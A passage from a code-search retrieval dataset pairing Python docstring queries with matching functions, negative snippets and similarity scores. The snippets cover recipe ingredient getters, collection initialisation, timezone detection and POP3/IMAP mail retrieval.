"def solution_2(arr):\n total = 0\n for group in arr:\n group_list = []\n for person in group:\n group_list = group_list + person\n group_table = Counter(''.join(group_list))\n for k, v in group_table.items():\n if v == len(group):\n total += 1\n return total",
"def count_task1_group(answers):\n return len(set.union(*answers))",
"def sum_unique(l):\n pass",
"def count(self):\n return sum(1 for _ in self)",
"def doubles(counts):\n return (counts==2).sum()",
"def count_for(s, value):\n total = 0\n for elem in s:\n if elem == value:\n total = total + 1\n return total",
"def part_one(inp: defaultdict) -> int:\n result = set()\n color_queue = deque([\"shiny gold\"])\n while color_queue:\n for value in inp[color_queue.popleft()]:\n if value not in result:\n result.add(value)\n color_queue.append(value)\n return len(result)"
] |
[
"0.751714",
"0.6595445",
"0.6578135",
"0.63688713",
"0.63554883",
"0.62987095",
"0.62520295",
"0.61505234",
"0.611896",
"0.6113655",
"0.6109396",
"0.6081903",
"0.6042954",
"0.6038255",
"0.60293305",
"0.60198426",
"0.5956092",
"0.5953809",
"0.5915682",
"0.5913934",
"0.5906244",
"0.5900259",
"0.58895314",
"0.5864784",
"0.5851936",
"0.58257705",
"0.58021504",
"0.57733154",
"0.57694644",
"0.5752102"
] |
0.68980134
|
1
|
Get the ingredient spec.
|
def spec(self):
return self._spec
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_input_spec(self):\r\n return self.input_spec",
"def find_ingredient(self, ingredient_str):\n return self.find_doc('ingredient', 'name', self.get_unique_ingredients_name(ingredient_str))",
"def _get_spec(self, requirement_name):\n return Spec(','.join(self.versions_spec[requirement_name]))",
"def get_ingredient_props(self):\n return self.ing_pop",
"def recipe(self):\n return self.__recipe",
"def get_product_ingredients(self, driver):\n pass",
"def spec(self) -> Optional[pulumi.Input['PodDisruptionBudgetSpecArgs']]:\n return pulumi.get(self, \"spec\")",
"def extend_spec(self):\n return self._extend_spec",
"def instance_spec(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_spec\")",
"def instance_spec(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_spec\")",
"def element_spec(self):\n\n return self._element_spec",
"def get_spec_type(self):\r\n return self._spec_type",
"def GetRSpec(sliver_name):\n rec = sliver_name\n return rec.get('rspec', {}).copy()",
"def spec(self) -> \"VolumeAttachmentSpec\":\n return typing.cast(\n \"VolumeAttachmentSpec\",\n self._properties.get(\"spec\"),\n )",
"def instance_spec(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"instance_spec\")",
"def getIngredientImg(self, name):\n x0, y0, x1, y1 = ShoppingMode.getCellBounds(self, 0, 0)\n goalWidth = x1-x0\n \n path = ''\n img = None\n \n Ingredient = ShoppingMode.getIngredientObject(self, name)\n path = Ingredient.path \n img = self.loadImage(path)\n scaleFactor = ShoppingMode.findScaleFactor(self, img, goalWidth)\n img = self.scaleImage(img, scaleFactor)\n\n return img #returns the loaded image to store in the list in inventory",
"def get_specsheet(self):\n if hasattr(self, 'specsheet'):\n return self.specsheet",
"def _get_spec_info(self):\n raise NotImplementedError()",
"def __enter__(self):\n return self.spec",
"def required_slots(tracker: Tracker) -> List[Text]:\n\n return [\"ingredient\"]",
"def get_recipe_raw_definition(self):\n return self.recipe_settings",
"def get_weapon(self):\n\n return self.suggestion_set[1]",
"def ingredients(id):\n if id == \"\":\n return \"None\"\n else:\n try:\n return BreweryDb.beer(id + \"/ingredients\")['data']\n except Exception:\n return [{\"category\": \"\", \"name\": \"\"}]",
"def getIngredients():\n ingredients = ['Whiskey', 'Tequila', 'Vodka', 'Blue Curacao', 'Orange Juice',\n 'Pineapple Juice', 'Cranberry Juice', 'Sour Mix']\n return ingredients",
"def spec(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"spec is deprecated: Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\")\n\n return pulumi.get(self, \"spec\")",
"def spec(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"spec is deprecated: Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\")\n\n return pulumi.get(self, \"spec\")",
"def ingredients(post):\n try:\n if type(post) == Recipe:\n recipe = post\n else:\n recipe = Recipe.objects.get(id=post.id)\n return mark_safe(render_to_string('partial/ingredients.html', {'measurements': recipe.measurement_set.all()}))\n except Recipe.DoesNotExist:\n return \"\"",
"def __repr__(self):\n\n return \"<Ingredient ingredient_id=%d recipe_id=%s quantity=%s measure=%s item=%s prep_notes=%s>\" % (self.ingredient_id, self.recipe_id, self.quantity, self.measure, self.item, self.prep_notes)",
"def test_get_recipe_ingredients_by_id(self):\n pass",
"def recipe(self, recipe):\n import hxl.filters\n return hxl.filters.from_recipe(self, recipe)"
] |
[
"0.6274449",
"0.6177592",
"0.60568184",
"0.60404813",
"0.59850353",
"0.5973417",
"0.5872426",
"0.58190626",
"0.5700041",
"0.5700041",
"0.56123567",
"0.55838734",
"0.55769014",
"0.55754685",
"0.5558199",
"0.5453096",
"0.5428837",
"0.5402059",
"0.5395059",
"0.5375218",
"0.53725255",
"0.5357777",
"0.5318513",
"0.53079116",
"0.52961606",
"0.52961606",
"0.5291619",
"0.52645046",
"0.52457535",
"0.52131754"
] |
0.65218824
|
0
|
Sets the initial state of self, which includes the contents of sourceCollection, if it is present.
|
def __init__(self, sourceCollection = None):
self._size = 0
self._modCount = 0
if sourceCollection:
for item in sourceCollection:
self.add(item)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def __init__(self, sourceCollection = None):\n self._front = self._rear = None\n AbstractCollection.__init__(self, sourceCollection)",
"def source(self, source):\n\n self._source = source",
"def source(self, source):\n\n self._source = source",
"def source(self, source):\n\n self._source = source",
"def source(self, source):\n\n self._source = source",
"def source(self, source):\n\n self._source = source",
"def source(self, source):\n\n self._source = source",
"def source(self, source):\n\n self._source = source",
"def source(self, source: Source):\n self._source = source",
"def __init__(self, sourceCollection=None):\n self._items = Array(ArrayList.DEFAULT_CAPACITY)\n AbstractList.__init__(self, sourceCollection)",
"def update_source(self):\n if self.verbose:\n print(\"Updating source\")\n self.source.data = self.source_data\n if self.source.selected is not None:\n self.source.selected.indices = self.selection\n for c in self.callbacks[\"update_source\"]:\n c()\n self.pending_update = False\n if self.update_buffer is not None:\n self.context.doc.add_next_tick_callback(self.update_buffer)\n self.update_buffer = None",
"def set_source(self, source):\n self.data['source'] = source",
"def refresh_source(self):\n pass",
"def sources(self, sources):\n\n self._sources = sources",
"def populated_collection(self, empty_collection, plain_collection):\n raise NotImplementedError",
"def classified_sources(self, classified_sources):\n\n self._classified_sources = classified_sources",
"def _set_source(self, source):\n if source != self._source:\n self._source = source\n self._channel = \"\"\n self._channel_name = \"\"\n self._is_forced_val = True\n self._forced_count = 0",
"def _assign(self, source):\n if self._parent:\n oldZincRegion = self._zincRegion\n zincSiblingAfter = oldZincRegion.getNextSibling()\n else:\n oldZincRegion = None\n zincSiblingAfter = None\n self.freeContents()\n self._name = source._name\n # self._parent = source._parent should not be changed\n self._children = source._children\n for child in self._children:\n child._parent = self\n self._modelSources = source._modelSources\n self._zincRegion = source._zincRegion\n # self._ancestorModelSourceCreated is unchanged\n if self._parent:\n self._parent._zincRegion.removeChild(oldZincRegion)\n self._parent._zincRegion.insertChildBefore(self._zincRegion, zincSiblingAfter)",
"async def async_set_source(self, source):\n self._source = source\n #self.async_schedule_update_ha_state(True)",
"def __init__(self, source):\n self._source = source",
"def __init__(self,sourceCollection=None):\n self._item=list()\n AbstractDict.__init__(self,sourceCollection)",
"def set_source(self, source_name):\n self.source = source_name",
"def source(self, source):\n\n self._close()\n self._source = source\n\n self.src = rasterio.open(source)\n\n idx = getattr(self, 'indexes', None)\n if idx is None:\n self.indexes = list(range(1, self.src.count+1))",
"def _reset_collection(self):\r\n\r\n self._meta.queryset._document._collection = None\r\n self._meta.queryset._collection_obj = self._meta.queryset._document._get_collection()\r\n if hasattr(self._meta.queryset, '_reset_already_indexed'):\r\n self._meta.queryset._reset_already_indexed()",
"def source_id(self, source_id):\n\n self._source_id = source_id",
"def source_id(self, source_id):\n\n self._source_id = source_id",
"def source_contact(self, source_contact):\n \n self._source_contact = source_contact",
"def source(self, source: List[StateSchema]):\n if source is None:\n raise ValueError(\"Invalid value for `source`, must not be `None`\") # noqa: E501\n\n self._source = source",
"def _source_filename_field_was_properly_initialized(self):\n if not Rule.sources_list_is_initialized:\n Rule.sources_list.append(self.source)\n Rule.sources_list_is_initialized = True\n # print(f\"if {self.source} not in {Rule.sources_list}\")\n if self.source not in Rule.sources_list:\n # print(f\"In rule: {self}\")\n # print(f\"Rule.sources_list = {Rule.sources_list}\")\n raise UninitializedSourceError(f\"{repr(self.source)} not initialized.\")\n if self.target not in Rule.sources_list:\n Rule.sources_list.append(self.target)\n return True",
"def set_flow_source(self, source):\n self._source = source"
] |
[
"0.6834638",
"0.61755556",
"0.61755556",
"0.61755556",
"0.61755556",
"0.61755556",
"0.61755556",
"0.61755556",
"0.6115388",
"0.5937697",
"0.58528554",
"0.58218473",
"0.5799573",
"0.5783457",
"0.57636255",
"0.575177",
"0.56940144",
"0.5668226",
"0.56664675",
"0.56180024",
"0.55962116",
"0.55520076",
"0.55442584",
"0.5527246",
"0.55158293",
"0.55158293",
"0.5508826",
"0.5505585",
"0.5504841",
"0.54467446"
] |
0.7065542
|
0
|
We will attempt to get the local timezone of the server running the module and use that. If we can't get the timezone then we will set the default to be UTC Linnux has been tested and other opersting systems should be OK. Failures cause assumption of UTC Windows is not supported and will assume UTC
|
def _get_local_tz(module, timezone='UTC'):
if platform.system() == 'Linux':
timedatectl = get_bin_path('timedatectl')
if timedatectl is not None:
rcode, stdout, stderr = module.run_command(timedatectl)
if rcode == 0 and stdout:
line = _findstr(stdout, 'Time zone')
full_tz = line.split(":", 1)[1].rstrip()
timezone = full_tz.split()[0]
return timezone
else:
module.warn('Incorrect timedatectl output. Timezone will be set to UTC')
else:
if os.path.exists('/etc/timezone'):
timezone = get_file_content('/etc/timezone')
else:
module.warn('Could not find /etc/timezone. Assuming UTC')
elif platform.system() == 'SunOS':
if os.path.exists('/etc/default/init'):
for line in get_file_content('/etc/default/init', '').splitlines():
if line.startswith('TZ='):
timezone = line.split('=', 1)[1]
return timezone
else:
module.warn('Could not find /etc/default/init. Assuming UTC')
elif re.match('^Darwin', platform.platform()):
systemsetup = get_bin_path('systemsetup')
if systemsetup is not None:
rcode, stdout, stderr = module.execute(systemsetup, '-gettimezone')
if rcode == 0 and stdout:
timezone = stdout.split(':', 1)[1].lstrip()
else:
module.warn('Could not run systemsetup. Assuming UTC')
else:
module.warn('Could not find systemsetup. Assuming UTC')
elif re.match('^(Free|Net|Open)BSD', platform.platform()):
if os.path.exists('/etc/timezone'):
timezone = get_file_content('/etc/timezone')
else:
module.warn('Could not find /etc/timezone. Assuming UTC')
elif platform.system() == 'AIX':
aix_oslevel = int(platform.version() + platform.release())
if aix_oslevel >= 61:
if os.path.exists('/etc/environment'):
for line in get_file_content('/etc/environment', '').splitlines():
if line.startswith('TZ='):
timezone = line.split('=', 1)[1]
return timezone
else:
module.warn('Could not find /etc/environment. Assuming UTC')
else:
module.warn('Cannot determine timezone when AIX os level < 61. Assuming UTC')
else:
module.warn('Could not find /etc/timezone. Assuming UTC')
return timezone
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _get_tz():\n return 'UTC'",
"def timezone():\n \n pass",
"def local_timezone() -> Timezone | FixedTimezone:\n return get_local_timezone()",
"def local_tz(self):\n return pytz.timezone(self.calendar.timezone)",
"def timezone():\n\n return time.timezone",
"def get_timezone():\n return dates.get_timezone(_get_tz())",
"def local_zone():\n return get_localzone()",
"def _getUTC(self, config = {} ):\n # Default implementation: get system local time\n return datetime.datetime.utcnow()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def get_timezone():\n localTimezone = request.args.get('timezone')\n if localTimezone in pytz.all_timezones:\n return localTimezone\n else:\n raise pytz.exceptions.UnknownTimeZoneError\n userId = request.args.get('login_as')\n localTimezone = users[int(userId)]['timezone']\n if localTimezone in pytz.all_timezones:\n return localTimezone\n else:\n raise pytz.exceptions.UnknownTimeZoneError\n return app.config['BABEL_DEFAULT_TIMEZONE']",
"def _convertTZ(self):\n tz = timezone.get_current_timezone()\n dtstart = self['DTSTART']\n dtend = self['DTEND']\n if dtstart.zone() == \"UTC\":\n dtstart.dt = dtstart.dt.astimezone(tz)\n if dtend.zone() == \"UTC\":\n dtend.dt = dtend.dt.astimezone(tz)",
"def _now():\n return datetime.now(timezone.utc).astimezone()",
"def _get_tzinfo(zonelabel):\n return moment.tzinfo(zonelabel) if zonelabel else _get_global_tz()",
"def time_zone():\n return timezone('Etc/GMT-10')",
"def nowUTC():\n return datetime.datetime.now(pytz.utc)"
] |
[
"0.7593437",
"0.70392257",
"0.68582565",
"0.68310165",
"0.6800011",
"0.6789667",
"0.6762175",
"0.67572707",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64806175",
"0.6460663",
"0.64227194",
"0.6400527",
"0.6396045",
"0.6384426"
] |
0.76198214
|
0
|
Connect to pop3 server and close the connection
|
def get_pop3_connectivity(self):
try:
if self.opt_use_ssl:
self.server = poplib.POP3_SSL(self.opt_pop3_server)
else:
self.server = poplib.POP3(self.opt_pop3_server)
except Exception as e:
raise Exception(
"Error connecting to %s with exception %s" %
(self.opt_pop3_server, str(e)))
else:
self.helper.log_debug(
'get_pop3_connectivity: successfully connected to %s' %
self.opt_pop3_server)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_pop3(self):\n self._endpointServerTest(\"pop3\", protocols.POP3Factory)",
"def connect_push(self):\n protocol, host, port = self.client_config.socket_host_port\n self.push_client = PushClient(host, port, (protocol == \"ssl\"))\n\n self.push_client.quote_changed = self.on_quote_change\n self.push_client.asset_changed = self.on_asset_change\n self.push_client.position_changed = self.on_position_change\n self.push_client.order_changed = self.on_order_change\n self.push_client.connect_callback = self.on_push_connected\n\n self.push_client.connect(\n self.client_config.tiger_id, self.client_config.private_key)",
"def test_endpointPOP3(self):\n self._endpointTest(\"pop3\")",
"def close(self): \n\t\tself.connection = None",
"def __init__(self, host, port = POP3_SSL_PORT,\r\n timeout=socket._GLOBAL_DEFAULT_TIMEOUT,\r\n username=None, password=None,\r\n certChain=None, privateKey=None,\r\n checker=None,\r\n settings=None):\r\n self.host = host\r\n self.port = port\r\n sock = socket.create_connection((host, port), timeout)\r\n ClientHelper.__init__(self,\r\n username, password,\r\n certChain, privateKey,\r\n checker,\r\n settings)\r\n connection = TLSConnection(sock) \r\n ClientHelper._handshake(self, connection)\r\n self.sock = connection\r\n self.file = self.sock.makefile('rb')\r\n self._debugging = 0\r\n self.welcome = self._getresp()",
"def reconnect(self):\n self.close()\n self.connect()",
"async def close_connection(self):\n\t\t...",
"def close(self):\n self._connection.close()",
"def close_connection(self):\r\n if self.conn:\r\n self.conn.close()",
"def close(self): \n self.connection.close()",
"def connect(self):\n\t\tif cint(self.settings.use_imap):\n\t\t\treturn self.connect_imap()\n\t\telse:\n\t\t\treturn self.connect_pop()",
"def close_connection(self):\n if self.socket:\n self.socket.close()",
"def close(self) :\n if self.ssh is not None :\n self.ssh.close()\n self.ssh = None\n self.connected = False",
"def _connect(self):\r\n self.sock = socket.socket()\r\n host = \"pubsub.pubnub.com\"\r\n port = 80\r\n if self.use_ssl:\r\n self.sock = ssl.wrap_socket(self.sock)\r\n port = 443\r\n self.sock.connect((host, port))\r\n self.connected = True",
"def disconnect(self):\n self.connection.close()",
"def close(self):\n self.should_connect = False\n self.retry = 0\n self.resp.close()",
"def close(self):\n if self.scp_conn:\n self.scp_conn.close()",
"def disconnect(conn):\n conn.close()",
"def close(self):\n self.connect.close()",
"def close_connection(self):\n self.nodesocket.close()",
"def close_connection(self):\n\n self._connection.close()\n print(\"Closed connection....\")",
"def close(self):\n if self.push_socket is not None:\n self.push_socket.close()\n\n if self.pull_socket is not None:\n self.pull_socket.close()\n\n if self.control_socket is not None:\n self.control_socket.close()",
"def connect(self):\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n if self.print_send:\n print(' - connecting...')\n self.socket.settimeout(1)\n self.socket.connect(self.host_port)\n if self.print_send:\n print(' - connected')\n except socket.timeout:\n raise Timeout('Timeout connecting to projector')\n except Exception as err:\n raise Error('Connection failed', err)\n self.expect(b'PJ_OK')\n self.send(b'PJREQ')\n self.expect(b'PJACK')",
"def close_connection(self):\n self.conn.close()",
"def remote_destroy(self):\r\n self.transport.loseConnection()",
"def close_connection(self):\n self.connection.close()",
"def close_connection(self):\n self.connection.close()",
"def _close_connection(self):\n if self.connection:\n self.connection.destroy()\n self.connection = None",
"def connect_to_rpc():\n provider = \"http://\"\n\n ip = input(\"IP of provider: \")\n provider += \"127.0.0.1\" if ip == \"\" else ip\n\n provider += \":\"\n\n port = input(\"Port of provider: \")\n provider += \"8545\" if port == \"\" else port\n\n print(\"Connecting to provider: \" + provider)\n web3 = Web3(HTTPProvider(provider))\n return web3",
"def close(self):\n if self.conn is not None:\n self.conn.close()\n self.conn = None"
] |
[
"0.6312033",
"0.5734185",
"0.5654881",
"0.5634933",
"0.56250674",
"0.56024295",
"0.557485",
"0.5563851",
"0.555122",
"0.5512034",
"0.549845",
"0.5483903",
"0.54780346",
"0.54713434",
"0.547061",
"0.54593366",
"0.5439628",
"0.5426821",
"0.5422101",
"0.54153687",
"0.5403732",
"0.5401667",
"0.53862226",
"0.5364972",
"0.5352949",
"0.53286636",
"0.53286636",
"0.53110164",
"0.5301738",
"0.53013444"
] |
0.7447212
|
0
|
Connect to pop3 server and return a list of ALL msg uids Unlike the IMAP equivalent filtering based on Subject is done elsewhere
|
def get_dmarc_messages(self):
messages = []
try:
if self.opt_use_ssl:
self.server = poplib.POP3_SSL(self.opt_pop3_server)
self.server.user(self.opt_global_account["username"])
self.server.pass_(self.opt_global_account["password"])
else:
self.server = poplib.POP3(self.opt_pop3_server)
self.server.user(self.opt_global_account["username"])
self.server.pass_(self.opt_global_account["password"])
except Exception as e:
raise Exception(
"Error connecting to %s with exception %s" %
(self.opt_pop3_server, str(e)))
else:
self.helper.log_debug(
'get_dmarc_messages: successfully connected to %s' %
self.opt_pop3_server)
messages = self.byte2str(self.server.uidl()[1])
self.helper.log_info(
'get_dmarc_messages: %d messages' %
len(messages))
return messages
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_messages(user, password, server=\"pop.gmail.com\"):\n\n # define our connection\n pop_conn = poplib.POP3_SSL(server)\n pop_conn.user(user)\n pop_conn.pass_(password)\n\n # Get message tuples from server:\n tuples = [pop_conn.retr(i) for i in range(1, len(pop_conn.list()[1]) + 1)]\n pop_conn.quit()\n\n # returns the message objects in a list, discarding the other fields\n return [msg[1] for msg in tuples]",
"def get_mailbox_uidls(mailbox):\r\n\r\n mbxfile = \"%s\\\\%s.mbx\" % (mailboxdir, mailbox)\r\n\r\n print \"Opening mbx: [%s]\" % mbxfile\r\n\r\n if not os.path.exists(mbxfile):\r\n return []\r\n\r\n fd = open(mbxfile)\r\n\r\n uidls=[]\r\n\r\n for line in fd.readlines():\r\n if line[0:7] == \"* UIDL:\":\r\n list = line.split(':')\r\n uidls.append( list[1].strip() )\r\n\r\n fd.close()\r\n\r\n return uidls\r\n\r\n \"\"\"This function returns a list of all of the uidl (unique id's) of\r\n all of the messages on the server \"\"\"",
"def fetch_mailbox((mailbox, host, user, passwd)):\r\n\r\n global text, attachments\r\n\r\n ## login to the pop3 server ==============================\r\n print\r\n print \"###### Connecting to %s\" % host\r\n M = poplib.POP3(host)\r\n M.set_debuglevel(1)\r\n M.user(user)\r\n M.pass_(getpass.getpass())\r\n\r\n ## create the mailbox and attachments directories if required\r\n if not os.path.exists (mailboxdir):\r\n print \"Creating Directory %s\", mailboxdir\r\n os.mkdir (mailboxdir)\r\n\r\n att_dir = \"%s\\\\att_%s\" % (mailboxdir, mailbox)\r\n if not os.path.exists (att_dir):\r\n print \"Creating Directory %s\", att_dir\r\n os.mkdir (att_dir)\r\n\r\n \r\n ## get list of uidls in the mailbox file =================\r\n uidls = get_mailbox_uidls(mailbox)\r\n\r\n ## get number of messages ================================\r\n numMessages = len(M.list()[1])\r\n print \"There are %d messages on the server\" % numMessages\r\n\r\n\r\n ## get uidls from server and compare with the uidls in the\r\n ## mailbox ===============================================\r\n uidls_srv = M.uidl()\r\n list = uidls_srv[1]\r\n fetchlist = []\r\n for item in list:\r\n msgno, uidl = item.split(' ')\r\n msgno = int(msgno)\r\n if not uidl in uidls:\r\n print \"Found new message: (%d, %s)\" % (msgno, uidl)\r\n fetchlist.append(msgno)\r\n\r\n print \"There are %d new messages on the server\" % len(fetchlist)\r\n\r\n alltext = \"\" ## this variable contains the mbox contents\r\n\r\n ## go over all of the emails =============================\r\n for i in fetchlist:\r\n\r\n flatmsg = \"\"\r\n\r\n ## retreive message\r\n# for line in M.retr(i+1)[1]:\r\n for line in M.retr(i)[1]:\r\n flatmsg += line + \"\\r\\n\"\r\n\r\n ## parse message\r\n msg = email.message_from_string (flatmsg)\r\n\r\n ## handle Email.message object\r\n title = handleMsg(mailbox, msg)\r\n\r\n\r\n msgtext = \"%s\\n%s* UIDL: %s\\n%s\\n\\n\" % (''.center(70,'#'), title, uidl, text)\r\n if not attachments == \"\":\r\n msgtext += \"#### Attachments:\\n%s\" % attachments\r\n\r\n alltext = msgtext.replace('\\r\\n','\\n') + alltext\r\n\r\n ## add 'alltext' to the beginning of the mailbox file ====\r\n mboxfile = \"%s\\\\%s.mbx\" % (mailboxdir, mailbox)\r\n contents = \"\"\r\n if os.path.exists(mboxfile):\r\n mbox = open(mboxfile, \"rt\")\r\n contents = mbox.read()\r\n mbox.close()\r\n\r\n mbox = open(mboxfile, \"wt\")\r\n mbox.write (alltext)\r\n if contents != \"\":\r\n mbox.write (contents)\r\n\r\n mbox.close()\r\n\r\n return len(fetchlist)",
"def filter_seen_messages(self, messages):\n seen_uids = set()\n for uid in messages:\n key = \"%s_%s_%s\" % (self.opt_pop3_server,\n self.opt_global_account[\"username\"], uid.split()[1])\n if self.helper.get_check_point(key) is not None:\n seen_uids.add(uid)\n new_uids = set(messages) - seen_uids\n self.helper.log_debug(\n 'filter_seen_messages: uids on pop3 %s' %\n set(messages))\n self.helper.log_debug(\n 'filter_seen_messages: uids in checkp %s' %\n seen_uids)\n self.helper.log_debug(\n 'filter_seen_messages: uids new %s' %\n new_uids)\n return new_uids",
"def fetchmail(self):\n mails = []\n\n if self.security == 'SSL/TLS':\n imap = IMAP4_SSL(self.host, self.port)\n else:\n imap = IMAP4(self.host, self.port)\n if self.security == 'STARTTLS':\n imap.starttls()\n imap.login(self.username, self.passwd)\n imap.select(readonly=True)\n\n status, uids = imap.uid('SEARCH', 'UNSEEN')\n\n for uid in uids[0].split():\n status, data = imap.uid('FETCH', uid, '(BODY[HEADER.FIELDS (DATE SUBJECT FROM)])')\n message = self._message_from_data(data)\n mail = Mail(uid, message['FROM'], message['SUBJECT'], message['DATE'])\n mails.append(mail)\n\n imap.close()\n imap.logout()\n\n return mails",
"def getMail():\n\n while 1:\n #if 1==1:\n \n try:\n Mailbox = poplib.POP3(c.Server['host'], c.Server['port']) \n Mailbox.user(c.Server['username']) \n Mailbox.pass_(c.Server['password']) \n numMessages = len(Mailbox.list()[1])\n \n \n log.info(\"Connected to %s and there are %i messages\"%(c.Server['host'], numMessages))\n \n for i in range(numMessages):\n msg = Mailbox.top(i+1, 10000)\n #msg = Mailbox.retr(i+1) # removes messages\n qIncomingMail.put(msg)\n log.debug(\"getMail: put message %i in queue\"%i)\n Mailbox.quit()\n \n except:\n log.error(\"Failed to connect to %s\"%c.Server['host'])\n time.sleep(60)",
"def get_user_messages(user_id):\n pass \n # user_message_list = []\n\n # for message in sent messages:",
"def check_for_subscribers(mail, login_info):\n ADDRESS, PASSWORD = login_info\n\n try:\n mail.select('inbox')\n data = mail.search(None, 'ALL') \n except:\n mail = imaplib.IMAP4_SSL('imap.gmail.com')\n mail.login(ADDRESS, PASSWORD)\n mail.select('inbox')\n data = mail.search(None, 'ALL')\n \n mail_ids = data[1]\n id_list = mail_ids[0].split() \n\n if not id_list:\n return []\n\n first_email_id = int(id_list[0])\n latest_email_id = int(id_list[-1])\n\n subscribers = []\n\n for i in range(latest_email_id, first_email_id-1, -1):\n data = mail.fetch(str(i), '(RFC822)')\n for response_part in data:\n arr = response_part[0]\n if isinstance(arr, tuple):\n msg = email.message_from_string(str(arr[1],'utf-8'))\n email_from = msg['from']\n subscribers.append(email_from)\n\n return subscribers",
"def get_email_ids(conn, query='ALL'):\n if conn.state != \"SELECTED\":\n raise imaplib.IMAP4.error(\"Cannot search without selecting a folder\")\n\n rv, data = conn.uid('search', None, query)\n if rv != 'OK':\n print (\"Could not fetch email ids\") # for some reason...\n return []\n\n return data[0].split()",
"def mailchimp_control():\n print('Starting MailChimp API Call')\n mc_login_info = mailchimp.get_keys()\n mc_data = mailchimp.open_connection(mc_login_info)\n\n mc_lists = mc_data[0]\n mc_emails = mc_data[1]\n\n mc_lists = mailchimp.get_lists(mc_lists)\n emails[:] = mailchimp.get_emails(mc_emails)\n return [mc_lists, mc_emails]",
"def get_public_messages(self):\n messages = []\n for message in self.messages:\n if message.message_id != None:\n messages.append(message)\n return messages",
"def fetch_messages_from_imap(host, port, username, password):\n\n with imaplib.IMAP4(host, port=port) as client:\n client.starttls()\n client.login(username, password)\n client.select(\"INBOX\", readonly=False)\n\n client.create(\"Archives\")\n client.create(\"Archives/Crashreport\")\n\n sorted_reply = client.uid(\"SORT\", \"(DATE)\", \"UTF7\", \"ALL\")\n\n if not sorted_reply[0] == \"OK\":\n raise IMAPClientError()\n\n sorted_messages = sorted_reply[1][0].split()\n\n for msg_uid in sorted_messages:\n reply = client.uid(\"FETCH\", msg_uid, \"(RFC822)\")\n\n if reply[0] != \"OK\":\n raise IMAPClientError()\n\n message = email.message_from_bytes(reply[1][0][1])\n\n yield message\n\n # mark message as read and move to archives\n mark_read_reply = client.uid(\"STORE\", msg_uid, \"+FLAGS\", \"(\\\\Seen)\")\n if mark_read_reply[0] != \"OK\":\n raise IMAPClientError()\n\n # moving messages in IMAP unfortunately means copy and delete\n copy_reply = client.uid(\"COPY\", msg_uid, \"Archives/Crashreport\")\n if copy_reply[0] != \"OK\":\n raise IMAPClientError()\n\n delete_reply = client.uid(\"STORE\", msg_uid, \"+FLAGS\", \"(\\\\Deleted)\")\n if delete_reply[0] != \"OK\":\n raise IMAPClientError()\n\n # delete the message immediately\n client.expunge()",
"def fetch( self, all=0, seen=None, mark=None ):\n conn = self._v_conn\n indx = self._v_indx\n msgs = []\n\n if seen is None:\n seen = self._v_seen\n if seen is None:\n all = 1\n mark = 0\n\n elif mark is None:\n mark = 1\n\n if indx is None:\n try:\n indx = self._getUids()\n except:\n LOG( 'MailServer.fetch', ERROR, '[%s@%s] error getting message index' % ( self._v_login, self.address() ), error=exc_info() )\n raise\n\n #LOG( 'MailServer.fetch', TRACE, 'server has %d message(s)' % len(indx) )\n\n for i, uid in indx:\n if not all and seen.has_key( uid ):\n continue\n\n #LOG( 'MailServer.fetch', TRACE, 'retrieving message %d uid=%s' % (i, uid) )\n\n try:\n res, lines, size = conn.retr( i )\n except:\n LOG( 'MailServer.fetch', ERROR, '[%s@%s] cannot retrieve message %d uid=%s' % ( self._v_login, self.address(), i, uid ), \\\n error=exc_info() )\n continue\n\n try:\n msg = self.createMessage( source=join( lines, '\\n') )\n except:\n LOG( 'MailServer.fetch', ERROR, '[%s@%s] cannot parse message %d uid=%s' % (self._v_login, self.address(), i, uid), \\\n error=exc_info() )\n continue\n\n msg.uid = uid\n msgs.append( msg )\n\n if mark:\n seen[ uid ] = 1\n\n return msgs",
